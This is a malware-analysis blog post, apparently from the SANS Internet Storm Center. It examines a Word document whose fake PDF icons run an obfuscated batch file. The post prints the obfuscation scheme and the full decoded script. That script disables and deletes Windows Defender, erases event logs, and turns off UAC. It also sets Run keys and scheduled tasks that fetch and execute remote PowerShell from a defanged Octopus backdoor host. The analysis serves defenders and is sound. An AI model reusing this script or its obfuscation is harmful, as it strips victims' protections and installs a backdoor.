Octopus Backdoor is Back with a New Embedded Obfuscated Bat File, (Mon, May 9th)

This post was originally published on this site

Last week, I found another interesting Word document that delivered an interesting malicious script to potential victims. Usually, Office documents carry VBA macros that are activated using a bit of social engineering (the classic yellow ribbon) but this time, the document did not contain any malicious code:

remnux@/MalwareZoo/20220505$ oledump.py f1763579a9319d2506ee468031e1eb1b.doc 
  1:       114 'x01CompObj'
  2:      4096 'x05DocumentSummaryInformation'
  3:      4096 'x05SummaryInformation'
  4:      7624 '1Table'
  5:     15906 'Data'
  6:      4096 'WordDocument'

But you can see stream 5 is called "Data". When you open the document, you see this:

The document SHA256 is 6e3ef2551b1f34685025f9fe1d6358ef95fbe21ada8ed9de3c7c4d5070520f6eand its current VT score is 22/60[1]. The document contains embedded objects that look like PDF files but they are'nt:

If you follow the instruction and click on one of the PDF icons (all three point to the same script), the script will be executed. Let's have a look at it:

It looks pretty well obfuscated:

%xlnlrpz%%fynwfvh%%dskbaxq%.%fynwfvh%%lxckycu%%fynwfvh% %wegkoem%%tjxpouf%%tjxpouf% %yvyapob%%eeuyvwk%%mkmhtbo%%hxiqvtv%%ybbwhci%%nutqtmu%%gfuxihu%%flbzyhx%%rmyyyjm%%wegkoem%%xlnlrpz%%fynwfvh%%hxiqvtv%%pjdvllg%%khoziql%%xlnlrpz%%nutqtmu%%ybbwhci%%nutqtmu%%gfuxihu%%flbzyhx%%rmyyyjm%%pjdvllg%%bysdcmi%%tjxpouf%%nutqtmu%%rmyyyjm%%ybbwhci%%khoziql%%jxdklrj%%xlnlrpz%%xlnlrpz%%fynwfvh%%bysdcmi%%flbzyhx%%cbwqklh%%fynwfvh%%xlnlrpz%%ybbwhci%%pjdvllg%%nutqtmu%%bysdcmi%%brlbmmf%%nutqtmu%%mkmhtbo%%pjdvllg%%khoziql%%pjdvllg%%fynwfvh%%ybbwhci%%ybbwhci%%tjtkrhi%%ybbwhci%%flbzyhx%%fynwfvh%%hxiqvtv% /%cbwqklh% %fynwfvh%%bysdcmi%%wegkoem%%bpltpmn%%mkmhtbo%%fynwfvh%%mkmhtbo%%jxdklrj%%wegkoem% /%flbzyhx% %xlnlrpz%%fynwfvh%%dskbaxq%_%tjxpouf%%rmyyyjm%%nutqtmu%%xlnlrpz%%tjxpouf% /%tjxpouf% 0 /%gfuxihu%

In Microsoft batch files, "%…%" represents a variable. If you look carefully at the code, you see that we just have a suite of environment variables with, sometimes, clear characters. Those characters are special ones like "/", "." or numbers. The obfuscation technique used here is pretty simple but efficient. Environment variables just contain letters from A to Z:

set wegkoem=a
set bpltpmn=b
set khoziql=c
set tjxpouf=d
set fynwfvh=e
set gfuxihu=f
set dskbaxq=g
set yvyapob=h
set pjdvllg=i
set mnmpqbg=j
set eeuyvwk=k
set mkmhtbo=l
set hxiqvtv=m
set bysdcmi=n
set nutqtmu=o
set brlbmmf=p
set hoahisa=q
set xlnlrpz=r
set ybbwhci=s
set flbzyhx=t
set jxdklrj=u
set cbwqklh=v
set rmyyyjm=w
set lxckycu=x
set tjtkrhi=y
set ikoiset=z

Once you replaced all variables with the corresponding letters, the script is easier to read but you still have to clean it:

@%e%%c%%h%%o% %o%%f%%f%

Here is the complete decoded script:

@echo off
reg delete "hklmsoftwarepoliciesmicrosoftwindows defender" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defender" /v "disableantispyware" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defender" /v "disableantivirus" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defendermpengine" /v "mpenablepus" /t reg_dword /d "0" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderreal-time protection" /v "disablebehaviormonitoring" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderreal-time protection" /v "disableioavprotection" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderreal-time protection" /v "disableonaccessprotection" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderreal-time protection" /v "disablerealtimemonitoring" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderreal-time protection" /v "disablescanonrealtimeenable" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderreporting" /v "disableenhancednotifications" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderspynet" /v "disableblockatfirstseen" /t reg_dword /d "1" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderspynet" /v "spynetreporting" /t reg_dword /d "0" /f
reg add "hklmsoftwarepoliciesmicrosoftwindows defenderspynet" /v "submitsamplesconsent" /t reg_dword /d "0" /f
rem 0 - disable logging
reg add "hklmsystemcurrentcontrolsetcontrolwmiautologgerdefenderapilogger" /v "start" /t reg_dword /d "0" /f
reg add "hklmsystemcurrentcontrolsetcontrolwmiautologgerdefenderauditlogger" /v "start" /t reg_dword /d "0" /f
rem disable wd tasks
schtasks /change /tn "microsoftwindowsexploitguardexploitguard mdm policy refresh" /disable
schtasks /change /tn "microsoftwindowswindows defenderwindows defender cache maintenance" /disable
schtasks /change /tn "microsoftwindowswindows defenderwindows defender cleanup" /disable
schtasks /change /tn "microsoftwindowswindows defenderwindows defender scheduled scan" /disable
schtasks /change /tn "microsoftwindowswindows defenderwindows defender verification" /disable
rem disable wd systray icon
reg delete "hklmsoftwaremicrosoftwindowscurrentversionexplorerstartupapprovedrun" /v "windows defender" /f
reg delete "hkcusoftwaremicrosoftwindowscurrentversionrun" /v "windows defender" /f
reg delete "hklmsoftwaremicrosoftwindowscurrentversionrun" /v "windowsdefender" /f
rem remove wd context menu
reg delete "hkcr*shellexcontextmenuhandlersepp" /f
reg delete "hkcrdirectoryshellexcontextmenuhandlersepp" /f
reg delete "hkcrdriveshellexcontextmenuhandlersepp" /f
rem disable wd services
reg add "hklmsystemcurrentcontrolsetserviceswdboot" /v "start" /t reg_dword /d "4" /f
reg add "hklmsystemcurrentcontrolsetserviceswdfilter" /v "start" /t reg_dword /d "4" /f
reg add "hklmsystemcurrentcontrolsetserviceswdnisdrv" /v "start" /t reg_dword /d "4" /f
reg add "hklmsystemcurrentcontrolsetserviceswdnissvc" /v "start" /t reg_dword /d "4" /f
reg add "hklmsystemcurrentcontrolsetserviceswindefend" /v "start" /t reg_dword /d "4" /f
reg add "hklmsystemcurrentcontrolsetservicessecurityhealthservice" /v "start" /t reg_dword /d "4" /f

reg.exe add hklmsoftwaremicrosoftwindowscurrentversionpoliciessystem /v enablelua /t reg_dword /d 0 /f

reg add "hkey_current_usersoftwaremicrosoftwindowscurrentversionrun" /v "#one" /t reg_sz /d "powershell -w hidden "add-type -assemblyname system.core;iex (new-object net.webclient).downloadstring('hxxp://hpsj[.]firewall-gateway[.]net:80/hpjs.php');"" /f

reg add "hkey_current_usersoftwaremicrosoftwindowscurrentversionrun" /v "#oneupdate" /t reg_sz /d "powershell -w hidden "add-type -assemblyname system.core;iex (new-object net.webclient).downloadstring('hxxp://hpsj[.]firewall-gateway[.]net:443/uddiexplorer');"" /f

"c:program filesmicrosoft security clientsetup.exe" /x /s /disableoslimit

start /b powershell add-mppreference -exclusionpath "c:" -force

start /b powershell add-mppreference -exclusionpath "c:users" -force

start /b powershell -w hidden "iex(new-object net.webclient).downloadstring('hxxp://hpsj[.]firewall-gateway[.]net:443/uddiexplorer');"
start /b powershell -w hidden "add-type -assemblyname system.core;iex (new-object net.webclient).downloadstring('hxxp://hpsj[.]firewall-gateway[.]net:80/hpjs.php');"

schtasks /create /sc minute /mo 60 /f /tn achromeupdater /tr "powershell -w hidden "add-type -assemblyname system.core;iex (new-object net.webclient).downloadstring(''hxxp://hpsj[.]firewall-gateway[.]net:80/hpjs.php''');""

schtasks /f /create /sc minute /mo 60 /tn achromeupdateri /tr "powershell.exe -w hidden 'iex (new-object net.webclient).downloadstring(''hxxp://hpsj[.]firewall-gateway[.]net:443/uddiexplorer''');'"

sc stop windefend
sc config windefend start= disabled
sc delete windefend
sc stop wdnissvc
sc config wdnissvc start= disabled
sc delete wdnissvc
sc stop sense
sc config sense start= disabled
sc delete sense
sc stop wuauserv
sc config wuauserv start= disabled
sc stop usosvc
sc config usosvc start= disabled
sc stop waasmedicsvc
sc config waasmedicsvc start= disabled
sc stop securityhealthservice
sc config securityhealthservice start= disabled
sc delete securityhealthservice
sc stop sdrsvc
sc config sdrsvc start= disabled
sc stop wscsvc
sc config wscsvc start= disabled
sc stop wdiservicehost
sc config wdiservicehost start= disabled
sc stop wdisystemhost
sc config wdisystemhost start= disabled
sc stop installservice
sc config installservice start= disabled
sc stop vaultsvc
sc config vaultsvc start= disabled
sc stop spooler
sc config spooler start= disabled
sc stop licensemanager
sc config licensemanager start= disabled
sc stop diagtrack
sc config diagtrack start= disabled
taskkill /f /im smartscreen.exe
taskkill /f /im securityhealthservice.exe
cd c:
cd c:program files
rd /s /q "windows defender"
rd /s /q "windows defender advanced threat protection"
rd /s /q "windows security"
cd c:program files (x86)
rd /s /q "windows defender"
cd c:programdatamicrosoft
rd /s /q "windows defender"
rd /s /q "windows defender advanced threat protection"
rd /s /q "windows security health"
cd c:
cd windows
cd system32
del /f windowsupdateelevatedinstaller.exe
del /f securityhealthsystray.exe
del /f securityhealthservice.exe
del /f securityhealthhost.exe
del /f securitycenterbroker.dll
del /f securitycenterbrokerps.dll
del /f securityhealthagent.dll
del /f securityhealthproxystub.dll
del /f securityhealthsso.dll
del /f smartscreensettings.exe
del /f smartscreenps.dll
del /f smartscreen.exe
del /f windows.security.integrity.dll
del /f windowsdefenderapplicationguardcsp.dll
del /f wscsvc.dll
del /f wscsvc.dll.mui
del /f wsecedit.dll
cd winevtlogs
del /f microsoft-windows-windows defender4operational.evtx
del /f microsoft-windows-windows defender4whc.evtx
del /f microsoft-windows-security-audit-configuration-client4operational.evtx
del /f microsoft-windows-security-enterprisedata-filerevocationmanager4operational.evtx
del /f microsoft-windows-security-netlogon

The domain hpsj[.]firewall-gateway[.]net is well-known, it's a good old Octopus backdoor. I already wrote a diary about it in 2020[2]! But it seems to be back with a simple but effective obfuscation technique.

[1] https://www.virustotal.com/gui/file/6e3ef2551b1f34685025f9fe1d6358ef95fbe21ada8ed9de3c7c4d5070520f6e
[2] https://isc.sans.edu/forums/diary/Malicious+Word+Document+Delivering+an+Octopus+Backdoor/26918/

Xavier Mertens (@xme)
Senior ISC Handler – Freelance Cyber Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.